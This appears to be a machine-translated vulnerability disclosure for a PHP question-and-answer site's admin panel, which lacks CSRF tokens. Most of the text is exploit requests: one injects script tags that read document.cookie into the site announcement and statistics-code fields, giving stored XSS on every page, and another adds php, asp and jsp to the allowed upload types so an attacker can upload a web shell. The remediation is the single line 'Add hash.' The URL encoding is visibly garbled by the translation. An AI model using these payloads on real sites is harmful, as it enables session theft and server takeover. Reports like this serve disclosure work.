The program does not set HASH in the background to limit the protection of CSRF, which may cause some potential hazards. http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/ Site_announce = <script> alert (document. cookie) </script> & url_rewrite_enable = N & request_route = 1 & request_route_custom = % 2 Fhome % 2 Fe E % 2F % 3D % 3D % 3D % 2 Fexplore % 2F % 0A % 2 Fhome % 2 Fexplore % 2 Fguest % 3D % 3D % 3D % 2 Fguest % 0A % 2 Fhome % 2 Fexplore % 2Fcategory-(% 3 Anum) % 3D % 3D % 3D % 2 Fcategory % 2F (% 3 Anum) % 0A % 2 Fpeople % 2 Flist % 2F % 3D % 3D % 3D % 2 Fusers % 2F % 0A % 2 Faccount % 2 Flogin % 2F % 3D % 3D % 3D % 2 Flogin % 2F % 0A % 2 Faccount % 2 Flogout % 2F % 3D % 3D % 3D % 2 Flogout % 2 F % 0A % 2 Faccount % 2 Fsetting % 2F (% 3 Aany) % 2F % 3D % 3D % 2 Fsetting % 2F (% 3 Aany) % 2F & online_count_open = Y & online_interval = 15 & unread_flush_interval = 100 & auto_question_lock_day = 30 & statistic_code = % 3 Cscript % 3 Ealert (1) % 3C % 2 Fscript % 3E & report_reason = % E5 % B9 % BF % E5 % 91% 8A % 2 FSPAM % 0A % E6 % 81% B6 % E6 % 84% 8F % E7 % 81% 8C % E6 % B0 % B4 % 0A % E8 % BF % 9D % E8 % A7 % 84% E5 % 86% E5 % AE % B9 % 0A % E6 % 85% 96% E4 % B8 % 8D % E5 % AF % B9 % E9 % A2 % 98% 0A % E9 % 87% 8D % E5 % A4 % 8D % E5 % 8F % 91% E9 % 97% AE & report_message_uid = 1 & time_style = Y & admin_login_seccode = Y & _ post_type = ajax site_announce parameter corresponds to site function-> website announcement (HTML supported) the statistic_code parameter corresponds to: site function-> other parameters of website statistics code, by default. http://127.0.0.1:8080/wenda/?/admin/setting/type-content You can set the suffix of the uploaded file name in the content settings, which is more dangerous !!! Quick_publish = Y & upload_enable = Y & allowed_upload_types = jpg % 2 Cjpeg % 2 Cpng % 2 Cgif % 2 Czip % 2 Cdoc % 2 Cdocx % 2 Crar % 2 Cpdf % 2 Cpsd % 2 cphp % 2 Casp % 2 Caspx % 2 Cjsp & upload_size_limit = 512 & Strong = 2 & Strong = 100 & comment_limit = 0 & Strong = 12 & Strong = 512 & answer_edit_time = 30 & uninterested_fold = 5 & best_answer_day = 30 & best_answer_min_count = 3 & best_agree_min_count = 3 & related_question_keyw Ord_count = & _ post_type = ajax allowed_upload_types = jpg % 2 Cjpeg % 2 Cpng % 2 Cgif % 2 Czip % 2 Cdoc % 2 Cdocx % 2 Crar % 2 Cpdf % 2 Cpsd % 2 Cphp % 2 Casp % 2 Caspx % 2Cjsp understand... All users in XSS on the homepage.
You can directly use Shell.Solution:
Add hash.